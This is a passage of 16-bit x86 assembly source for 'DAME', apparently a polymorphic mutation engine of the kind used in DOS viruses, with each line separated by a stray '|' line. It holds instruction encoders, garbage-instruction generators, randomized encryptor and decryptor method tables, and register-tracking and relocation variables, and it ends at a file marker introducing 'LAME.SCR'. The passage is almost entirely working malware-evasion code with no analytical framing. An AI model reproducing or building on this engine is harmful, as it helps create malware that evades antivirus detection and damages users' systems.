|
mov_ah_xx:
|
|
_mov_ah_xx:
|
|
add al,04
|
|
mov_al_xx:
|
|
_mov_al_xx:
|
|
add al,0B0
|
|
mov ah,dl
|
|
stosw
|
|
ret
|
|
|
|
mov_reg_reg: ; ax, dx preserved
|
|
mov si,offset mov_reg_reg_table
|
|
jmp short go_handle_jmp_table1
|
|
|
|
_mov_reg_reg_push_pop:
|
|
push ax
|
|
xchg dx,ax
|
|
call _push ; PUSH REG2
|
|
pop ax
|
|
jmp _pop ; POP REG1
|
|
|
|
_mov_reg_reg:
|
|
mov ah,08Bh
|
|
jmp short _mod_reg_rm_direction
|
|
|
|
mov_xchg_reg_reg:
|
|
call one_in_two
|
|
js mov_reg_reg
|
|
|
|
xchg_reg_reg: ; ax, dx preserved
|
|
mov si,offset xchg_reg_reg_table
|
|
go_handle_jmp_table2:
|
|
jmp short go_handle_jmp_table1
|
|
|
|
_xchg_reg_reg_push_pop:
|
|
push dx ax dx
|
|
call _push ; PUSH REG1
|
|
pop ax
|
|
call _push ; PUSH REG2
|
|
pop ax
|
|
call _pop ; POP REG1
|
|
pop ax
|
|
jmp _pop ; POP REG2
|
|
|
|
_xchg_reg_reg_3rd_reg:
|
|
call free_regs
|
|
jne _xchg_reg_reg
|
|
|
|
push dx ax
|
|
call get_another ; Get free register (reg3)
|
|
call mov_xchg_reg_reg ; MOV/XCHG REG3,REG2
|
|
pop dx
|
|
call xchg_reg_reg ; XCHG REG3,REG1
|
|
pop dx
|
|
xchg ax,dx
|
|
call mov_xchg_reg_reg ; MOV/XCHG REG2,REG3
|
|
jmp clear_reg_dx
|
|
|
|
_xchg_reg_reg:
|
|
or al,al
|
|
js __xchg_reg_reg
|
|
|
|
cmp al,dl
|
|
jg _xchg_reg_reg_skip
|
|
xchg al,dl
|
|
_xchg_reg_reg_skip:
|
|
or dl,dl
|
|
jz _xchg_ax_reg
|
|
__xchg_reg_reg:
|
|
xchg al,dl
|
|
mov ah,87
|
|
jmp short _mod_reg_rm
|
|
_xchg_ax_reg:
|
|
add al,90
|
|
stosb
|
|
ret
|
|
|
|
xor_reg_xxxx_xor_xor:
|
|
call get_rand_bx
|
|
push bx
|
|
xor dx,bx
|
|
call xor_reg_xxxx
|
|
pop dx
|
|
jmp short xor_reg_xxxx
|
|
|
|
xor_reg_xxxx:
|
|
mov si,offset xor_reg_xxxx_table
|
|
jmp short go_handle_jmp_table2
|
|
|
|
_xor_reg_xxxx:
|
|
or al,030
|
|
jmp _81h_
|
|
|
|
xor_reg_reg:
|
|
mov si,offset xor_reg_reg_table
|
|
go_handle_jmp_table3:
|
|
jmp short go_handle_jmp_table2
|
|
|
|
_xor_reg_reg:
|
|
mov ah,33
|
|
; The following is the master encoder. It handles most traditional encodings
|
|
; with mod/reg/rm or mod/xxx/rm.
|
|
_mod_reg_rm_direction:
|
|
or al,al ; If al is a memory pointer,
|
|
js dodirection ; then we need to swap regs
|
|
or dl,dl ; If dl is a memory pointer,
|
|
js _mod_reg_rm ; we cannot swap registers
|
|
call one_in_two ; Otherwise there is a 50%
|
|
js _mod_reg_rm ; chance of swapping registers
|
|
dodirection:
|
|
xchg al,dl ; Swap the registers and adjust
|
|
sub ah,2 ; the opcode to compensate
|
|
_mod_reg_rm:
|
|
shl al,1 ; Move al to the reg field
|
|
shl al,1
|
|
shl al,1
|
|
or al,dl ; Move dl to the rm field
|
|
mod_xxx_rm:
|
|
or al,al ; Is al a memory pointer?
|
|
js no_no_reg ; If so, skip next line
|
|
|
|
or al,0c0 ; Mark register in mod field
|
|
no_no_reg:
|
|
xchg ah,al
|
|
|
|
test ah,40
|
|
jnz exit_mod_reg_rm
|
|
|
|
test cl,1
|
|
jnz continue_mod_xxx_rm
|
|
|
|
push ax
|
|
mov al,2e
|
|
stosb
|
|
pop ax
|
|
continue_mod_xxx_rm:
|
|
stosw
|
|
|
|
mov si,cs:[bp] ; Store the patch location
|
|
add si,si ; for the memory in the
|
|
mov cs:[si+bp+2],di ; appropriate table for later
|
|
inc word ptr cs:[bp] ; adjustment
|
|
; cs: overrides needed for bp
|
|
mov al,_relocate_amt
|
|
cbw
|
|
exit_mod_reg_rm:
|
|
stosw
|
|
ret
|
|
|
|
add_reg_reg:
|
|
mov si,offset add_reg_reg_table
|
|
jmp short go_handle_jmp_table3
|
|
|
|
_add_reg_reg:
|
|
mov ah,3
|
|
jmp short _mod_reg_rm_direction
|
|
|
|
sub_reg_reg:
|
|
mov si,offset sub_reg_reg_table
|
|
go_handle_jmp_table4:
|
|
jmp short go_handle_jmp_table3
|
|
|
|
_sub_reg_reg:
|
|
mov ah,2bh
|
|
jmp short _mod_reg_rm_direction
|
|
|
|
_add_reg_xxxx_inc_add:
|
|
call inc_reg
|
|
dec dx
|
|
jmp short add_reg_xxxx
|
|
|
|
_add_reg_xxxx_dec_add:
|
|
call dec_reg
|
|
inc dx
|
|
jmp short add_reg_xxxx
|
|
|
|
_add_reg_xxxx_add_add:
|
|
call get_rand_bx
|
|
push bx
|
|
sub dx,bx
|
|
call add_reg_xxxx
|
|
pop dx
|
|
jmp short add_reg_xxxx
|
|
|
|
add_reg_xxxx1:
|
|
neg dx
|
|
add_reg_xxxx:
|
|
or dx,dx
|
|
jnz cont
|
|
return1:
|
|
ret
|
|
cont:
|
|
mov si,offset add_reg_xxxx_table
|
|
jmp go_handle_jmp_table4
|
|
|
|
_add_reg_xxxx:
|
|
or al,al
|
|
jz _add_ax_xxxx
|
|
_81h_:
|
|
or al,al
|
|
js __81h
|
|
add al,0c0
|
|
__81h:
|
|
mov ah,81
|
|
mod_xxx_rm_stosw:
|
|
call mod_xxx_rm
|
|
_encode_dx_:
|
|
xchg ax,dx
|
|
stosw
|
|
ret
|
|
_add_ax_xxxx:
|
|
mov al,5
|
|
_encode_al_dx_:
|
|
stosb
|
|
jmp short _encode_dx_
|
|
|
|
sub_reg_xxxx1:
|
|
neg dx
|
|
sub_reg_xxxx:
|
|
_sub_reg_xxxx:
|
|
or dx,dx ; SUBtracting anything?
|
|
jz return1 ; If not, we are done
|
|
|
|
or al,al ; SUB AX, XXXX?
|
|
jz _sub_ax_xxxx ; If so, we encode in 3 bytes
|
|
add al,028 ; Otherwise do the standard
|
|
jmp short _81h_ ; mod/reg/rm deal
|
|
_sub_ax_xxxx:
|
|
mov al,2dh
|
|
jmp short _encode_al_dx_
|
|
|
|
dec_reg:
|
|
push ax
|
|
add al,8
|
|
jmp short _dec_inc_reg
|
|
inc_reg:
|
|
push ax
|
|
_dec_inc_reg:
|
|
or al,al
|
|
jns _norm_inc
|
|
mov ah,0ff
|
|
call mod_xxx_rm
|
|
pop ax
|
|
ret
|
|
_norm_inc:
|
|
add al,40
|
|
stosb
|
|
pop ax
|
|
ret
|
|
|
|
_mov_reg_reg_3rd_reg:
|
|
mov bx,offset mov_reg_reg
|
|
mov si,offset mov_xchg_reg_reg
|
|
or al,al ; Is reg1 a pointer register?
|
|
js reg_to_reg1 ; If so, we cannot use XCHG
|
|
jmp short reg_to_reg
|
|
|
|
xor_reg_reg_reg_reg:
|
|
mov bx,offset _xor_reg_reg
|
|
jmp short reg_to_reg1
|
|
add_reg_reg_reg_reg:
|
|
mov bx,offset _add_reg_reg
|
|
jmp short reg_to_reg1
|
|
sub_reg_reg_reg_reg:
|
|
mov bx,offset _sub_reg_reg
|
|
reg_to_reg1:
|
|
mov si,bx
|
|
reg_to_reg:
|
|
call free_regs
|
|
jne no_free_regs
|
|
|
|
push ax si
|
|
call get_another ; Get unused register (reg3)
|
|
call mov_reg_reg ; MOV REG3,REG2
|
|
pop si dx
|
|
xchg ax,dx
|
|
finish_reg_clear_dx:
|
|
push dx
|
|
call si
|
|
pop ax
|
|
jmp clear_reg
|
|
|
|
_xor_reg_xxxx_reg_reg:
|
|
mov bx,offset xor_reg_xxxx
|
|
mov si,offset xor_reg_reg
|
|
xxxx_to_reg:
|
|
call free_regs
|
|
jne no_free_regs
|
|
|
|
push ax si
|
|
call get_another ; Get unused register (reg3)
|
|
call mov_reg_xxxx ; MOV REG3,XXXX
|
|
xchg ax,dx
|
|
pop si ax
|
|
|
|
jmp short finish_reg_clear_dx
|
|
no_free_regs:
|
|
jmp bx
|
|
|
|
_add_reg_xxxx_reg_reg:
|
|
mov bx,offset add_reg_xxxx
|
|
mov si,offset add_reg_reg
|
|
jmp short xxxx_to_reg
|
|
|
|
_mov_reg_xxxx_reg_reg:
|
|
mov bx,offset mov_reg_xxxx
|
|
mov si,offset mov_xchg_reg_reg
|
|
jmp short xxxx_to_reg
|
|
|
|
; The following are a collection of tables used by the various encoding
|
|
; routines to determine which routine will be used. The first line in each
|
|
; table holds the mask for the encoding procedure. The second line holds the
|
|
; default routine which is used when nesting is disabled. The number of
|
|
; entries in each table must be a power of two. To adjust the probability of
|
|
; the occurence of any particular routine, simply vary the number of times it
|
|
; appears in the table relative to the other routines.
|
|
|
|
; The following table governs garbling.
|
|
garbletable:
|
|
db garbletableend - $ - 3
|
|
dw offset return
|
|
dw offset return
|
|
dw offset return
|
|
dw offset return
|
|
dw offset return
|
|
|
|
dw offset garble_tworeg
|
|
dw offset garble_tworeg
|
|
dw offset garble_tworeg
|
|
dw offset garble_onereg
|
|
dw offset garble_onereg
|
|
dw offset garble_onereg
|
|
|
|
dw offset garble_onebyte
|
|
dw offset garble_onebyte
|
|
dw offset garble_onebyte
|
|
dw offset garble_jmpcond
|
|
|
|
dw offset clear_PIQ
|
|
garbletableend:
|
|
|
|
; This table is used by the one byte garbler. It is intuitively obvious.
|
|
onebytetable:
|
|
clc
|
|
cmc
|
|
stc
|
|
cld
|
|
std
|
|
sti
|
|
int 3
|
|
lock
|
|
|
|
; This table is used by the one register garbler. When each of the functions
|
|
; in the table is called, ax holds a random, unused register, and dx holds a
|
|
; random number.
|
|
oneregtable:
|
|
db oneregtableend - $ - 3
|
|
dw offset xor_reg_xxxx
|
|
dw offset mov_reg_xxxx
|
|
dw offset sub_reg_xxxx
|
|
dw offset add_reg_xxxx
|
|
dw offset dec_reg
|
|
dw offset inc_reg
|
|
dw offset _ror
|
|
dw offset _rol
|
|
oneregtableend:
|
|
|
|
; This table is used to determine the decryption method
|
|
oneregtable1: ; dx = random #
|
|
db oneregtable1end - $ - 3
|
|
dw offset xor_reg_xxxx
|
|
dw offset sub_reg_xxxx
|
|
dw offset add_reg_xxxx
|
|
dw offset add_reg_xxxx
|
|
dw offset dec_reg
|
|
dw offset inc_reg
|
|
dw offset _ror
|
|
dw offset _rol
|
|
oneregtable1end:
|
|
|
|
; This table is used to determine the encryption method
|
|
oneregtable2: ; dx = random #
|
|
db oneregtable2end - $ - 3
|
|
dw offset xor_reg_xxxx
|
|
dw offset add_reg_xxxx
|
|
dw offset sub_reg_xxxx
|
|
dw offset sub_reg_xxxx
|
|
dw offset inc_reg
|
|
dw offset dec_reg
|
|
dw offset _rol
|
|
dw offset _ror
|
|
oneregtable2end:
|
|
|
|
tworegtable: ; dl = any register
|
|
db tworegtableend - $ - 3
|
|
dw offset xor_reg_reg
|
|
dw offset mov_reg_reg
|
|
dw offset sub_reg_reg
|
|
dw offset add_reg_reg
|
|
tworegtableend:
|
|
|
|
tworegtable1: ; dl = any register
|
|
db tworegtable1end - $ - 3
|
|
dw offset xor_reg_reg
|
|
dw offset xor_reg_reg
|
|
dw offset sub_reg_reg
|
|
dw offset add_reg_reg
|
|
tworegtable1end:
|
|
|
|
tworegtable2: ; dl = any register
|
|
db tworegtable2end - $ - 3
|
|
dw offset xor_reg_reg
|
|
dw offset xor_reg_reg
|
|
dw offset add_reg_reg
|
|
dw offset sub_reg_reg
|
|
tworegtable2end:
|
|
|
|
mov_reg_xxxx_table:
|
|
db mov_reg_xxxx_table_end - $ - 3
|
|
dw offset _mov_reg_xxxx
|
|
dw offset _mov_reg_xxxx_reg_reg
|
|
dw offset _mov_reg_xxxx_mov_add
|
|
dw offset _mov_reg_xxxx_mov_al_ah
|
|
dw offset _mov_reg_xxxx_mov_xor
|
|
dw offset _mov_reg_xxxx_xor_add
|
|
dw offset _mov_reg_xxxx_mov_rol
|
|
dw offset _mov_reg_xxxx_mov_ror
|
|
|
|
mov_reg_xxxx_table_end:
|
|
|
|
mov_reg_reg_table:
|
|
db mov_reg_reg_table_end - $ - 3
|
|
dw offset _mov_reg_reg
|
|
dw offset _mov_reg_reg
|
|
dw offset _mov_reg_reg_3rd_reg
|
|
dw offset _mov_reg_reg_push_pop
|
|
mov_reg_reg_table_end:
|
|
|
|
xchg_reg_reg_table:
|
|
db xchg_reg_reg_table_end - $ - 3
|
|
dw offset _xchg_reg_reg
|
|
dw offset _xchg_reg_reg
|
|
dw offset _xchg_reg_reg_push_pop
|
|
dw offset _xchg_reg_reg_3rd_reg
|
|
xchg_reg_reg_table_end:
|
|
|
|
xor_reg_xxxx_table:
|
|
db xor_reg_xxxx_table_end - $ - 3
|
|
dw offset _xor_reg_xxxx
|
|
dw offset _xor_reg_xxxx
|
|
dw offset _xor_reg_xxxx_reg_reg
|
|
dw offset xor_reg_xxxx_xor_xor
|
|
xor_reg_xxxx_table_end:
|
|
|
|
xor_reg_reg_table:
|
|
db xor_reg_reg_table_end - $ - 3
|
|
dw offset _xor_reg_reg
|
|
dw offset xor_reg_reg_reg_reg
|
|
xor_reg_reg_table_end:
|
|
|
|
add_reg_reg_table:
|
|
db add_reg_reg_table_end - $ - 3
|
|
dw offset _add_reg_reg
|
|
dw offset add_reg_reg_reg_reg
|
|
add_reg_reg_table_end:
|
|
|
|
sub_reg_reg_table:
|
|
db sub_reg_reg_table_end - $ - 3
|
|
dw offset _sub_reg_reg
|
|
dw offset sub_reg_reg_reg_reg
|
|
sub_reg_reg_table_end:
|
|
|
|
add_reg_xxxx_table:
|
|
db add_reg_xxxx_table_end - $ - 3
|
|
dw offset _add_reg_xxxx
|
|
dw offset _add_reg_xxxx
|
|
dw offset _add_reg_xxxx_reg_reg
|
|
dw offset sub_reg_xxxx1
|
|
dw offset _add_reg_xxxx_inc_add
|
|
dw offset _add_reg_xxxx_dec_add
|
|
dw offset _add_reg_xxxx_add_add
|
|
dw offset _add_reg_xxxx_add_add
|
|
|
|
add_reg_xxxx_table_end:
|
|
|
|
endif
|
|
|
|
if not vars eq 0 ; if (vars != 0)
|
|
|
|
; _nest is needed to prevent the infinite recursion which is possible in a
|
|
; routine such as the one used by DAME. If this value goes above the
|
|
; threshold value (defined as MAXNEST), then no further garbling/obfuscating
|
|
; will occur.
|
|
_nest db ?
|
|
|
|
; This is used by the routine mod_reg_rm when encoding memory accessing
|
|
; instructions. The value in _relocate_amt is later added to the relocation
|
|
; value to determine the final value of the memory adjustment. For example,
|
|
; we initially have, as the encryption instruction:
|
|
; add [bx+0],ax
|
|
; Let's say _relocate_amt is set to 2. Now the instruction reads:
|
|
; add [bx+2],ax
|
|
; Finally, the relocate procedure alters this to:
|
|
; add [bx+202],ax
|
|
; or whatever the appropriate value is.
|
|
;
|
|
; This value is used in double word encryptions.
|
|
_relocate_amt db ?
|
|
|
|
; Various memory locations which we must keep track of for calculations:
|
|
_loopstartencrypt dw ?
|
|
_loopstartdecrypt dw ?
|
|
|
|
_encryptpointer dw ?
|
|
_decryptpointer dw ?
|
|
|
|
_decryptpointer2 dw ?
|
|
|
|
_start_encrypt dw ?
|
|
_start_decrypt dw ?
|
|
beginclear1:
|
|
|
|
; _used_regs is the register tracker. Each byte corresponds to a register.
|
|
; AX = 0, CX = 1, DX = 2, etc. Each byte may be either set or zero. If it
|
|
; is zero, then the register's current value is unimportant to the routine.
|
|
; If it is any other value, then the routine should not play with the value
|
|
; contained in the register (at least without saving it first).
|
|
_used_regs db 8 dup (?) ; 0 = unused
|
|
|
|
; The following four variables contain the addresses in current memory which
|
|
; contain the patch locations for the memory addressing instructions, i.e.
|
|
; XOR WORD PTR [bx+3212],3212
|
|
; It is used at the end of the master encoding routine.
|
|
_encrypt_relocate_num dw ?
|
|
_encrypt_relocator dw 8 dup (?)
|
|
|
|
_decrypt_relocate_num dw ?
|
|
_decrypt_relocator dw 10 dup (?)
|
|
endclear1:
|
|
|
|
_encrypt_length dw ? ; The number of bytes to encrypt
|
|
; (based upon alignment)
|
|
_counter_value dw ? ; Forwards or backwards
|
|
_decrypt_value dw ? ; Not necessarily the crypt key
|
|
_pointer_value1 dw ? ; Pointer register 1's initial value
|
|
_pointer_value2 dw ? ; Pointer register 2's initial value
|
|
|
|
_counter_reg db ?
|
|
_encrypt_reg db ?
|
|
_pointer_reg1 db ? ; 4 = not in use
|
|
_pointer_reg2 db ?
|
|
|
|
_pointer_rm db ? ; Holds r/m value for pointer registers
|
|
_maxnest db ?
|
|
|
|
_kludge dw ?
|
|
|
|
endif
|
|
--End DAME.ASM--Begin LAME.SCR-------------------------------------------------
|